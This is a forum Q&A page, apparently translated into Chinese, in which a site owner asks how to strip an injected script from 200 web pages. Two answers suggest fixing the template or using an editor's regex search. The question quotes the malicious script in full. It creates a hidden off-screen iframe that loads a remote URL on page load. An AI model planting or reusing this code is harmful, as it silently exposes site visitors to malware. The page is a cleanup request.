0

是否有任何 Linux 命令可以从我们网站的所有 200 个页面中删除以下脚本?

function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://yankeeyiddos.com/media/index.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd;

首先我们要查找然后从页面中删除。我们尝试使用 sed 命令,但没有奏效。

4

2 回答 2

0

The easiest way would be to remove the script from the template you use to generate the 200 pages. You did not type them in one by one, did you? Also, consider using <link> and an external .js file to load the javascript that is common for more than one page.

于 2012-09-27T15:24:54.457 回答
0

您为什么要尝试使用命令将其删除?普通的文本编辑器或dreamweaver 可以轻松完成。你也可以在梦中用正则表达式告诉它开始参数和结束参数。只需要选择主文件夹和所有文件

于 2012-09-27T14:59:06.550 回答